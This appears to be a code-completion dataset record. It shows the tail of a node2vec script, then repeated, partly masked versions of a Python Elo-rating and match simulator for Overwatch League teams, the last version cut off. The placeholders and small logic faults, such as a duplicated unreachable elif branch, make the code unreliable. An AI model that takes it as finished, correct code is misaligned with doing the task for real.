default=2, type=int, help='Number of epochs in SGD')\n parser.add_argument('--workers', type=int, default=8, help='Number of parallel workers. Default is 8.')\n parser.add_argument('--p', type=float, default=1, help='Return hyperparameter. Default is 1.')\n parser.add_argument('--q', type=float, default=1, help='Inout hyperparameter. Default is 1.')\n parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.')\n parser.add_argument('--unweighted', dest='unweighted', action='store_false')\n parser.set_defaults(weighted=False)\n parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. Default is undirected.')\n parser.add_argument('--undirected', dest='undirected', action='store_false')\n parser.set_defaults(directed=False)\n return parser.parse_args()\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float), ), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n\n if not args.directed:\n G = G.to_undirected()\n\n return G\n\ndef learning_walks(walks):\n walks = [list(map(str, walk)) for walk in walks]\n model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter)\n model.wv.save_word2vec_format(args.output)\n return model\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n\n plot_embeddings(_embeddings, args.label_file)\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n\n\n", "step-ids": [ 7, 8, 12, 13, 15 ] }
[ 7, 8, 12, 13, 15 ]
<|reserved_special_token_0|> class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) <|reserved_special_token_0|> <|reserved_special_token_0|> def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. """ types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> <|reserved_special_token_0|> class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self, name): types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony', 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict. fromkeys(['dorado', 'junkertown', 'rialto', 'route-66', 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([ 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row', 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios', 'lijiang', 'nepal', 'oasis'], 'control')} return types[name] def predictMatch(self, team1, team2, maps, loops=10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType, maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps [i]][1] elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][maps[i] ] * mapname_weight + self.maptype_elos[team1][maptypes[i] ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][maps[i] ] * mapname_weight + self.maptype_elos[team2][maptypes[i] ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) if random_roll < team1winchance - drawchance / 2: team1score += 1 elif random_roll < team1winchance + drawchance / 2: pass else: team2score += 1 if team1score == team2score: map5 = random.choice([m for m in ['ilios', 'busan', 'lijiang'] if m not in maps]) elo1 = self.overall_elos[team1 ] * overall_weight + self.maptype_elos[team1]['control' ] * maptype_weight + self.mapname_elos[team1][map5 ] * mapname_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.maptype_elos[team2]['control' ] * maptype_weight + self.mapname_elos[team2][map5 ] * mapname_weight if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)): team1score += 1 else: team2score += 1 scoreline = '{}-{}'.format(team1score, team2score) if scoreline not in results: results[scoreline] = 0 results[scoreline] += 1 if team1score > team2score: team1wins += 1 results = {s: (results[s] / loops) for s in results} return results, team1wins / loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. """ types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> <|reserved_special_token_0|> start_elo = 0 decay_factor = 0.9 k = 30 d = 200 overall_weight = 0.6 maptype_weight = 0.2 mapname_weight = 0.2 teams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN', 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS' ] maptypes = ['control', 'assault', 'hybrid', 'escort'] mapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis', 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris'] postseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony', 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 'kings-row', 'dorado', 'gibraltar', 'rialto'] colorrequests = requests.get('https://api.overwatchleague.com/teams', timeout=10).text colordata = json.loads(colorrequests)['competitors'] class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self, name): types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony', 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict. fromkeys(['dorado', 'junkertown', 'rialto', 'route-66', 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([ 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row', 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios', 'lijiang', 'nepal', 'oasis'], 'control')} return types[name] def predictMatch(self, team1, team2, maps, loops=10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType, maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps [i]][1] elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][maps[i] ] * mapname_weight + self.maptype_elos[team1][maptypes[i] ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][maps[i] ] * mapname_weight + self.maptype_elos[team2][maptypes[i] ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) if random_roll < team1winchance - drawchance / 2: team1score += 1 elif random_roll < team1winchance + drawchance / 2: pass else: team2score += 1 if team1score == team2score: map5 = random.choice([m for m in ['ilios', 'busan', 'lijiang'] if m not in maps]) elo1 = self.overall_elos[team1 ] * overall_weight + self.maptype_elos[team1]['control' ] * maptype_weight + self.mapname_elos[team1][map5 ] * mapname_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.maptype_elos[team2]['control' ] * maptype_weight + self.mapname_elos[team2][map5 ] * mapname_weight if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)): team1score += 1 else: team2score += 1 scoreline = '{}-{}'.format(team1score, team2score) if scoreline not in results: results[scoreline] = 0 results[scoreline] += 1 if team1score > team2score: team1wins += 1 results = {s: (results[s] / loops) for s in results} return results, team1wins / loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. """ types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> import json, requests, math, random start_elo = 0 decay_factor = 0.9 k = 30 d = 200 overall_weight = 0.6 maptype_weight = 0.2 mapname_weight = 0.2 teams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN', 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS' ] maptypes = ['control', 'assault', 'hybrid', 'escort'] mapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis', 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris'] postseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony', 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 'kings-row', 'dorado', 'gibraltar', 'rialto'] colorrequests = requests.get('https://api.overwatchleague.com/teams', timeout=10).text colordata = json.loads(colorrequests)['competitors'] class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} 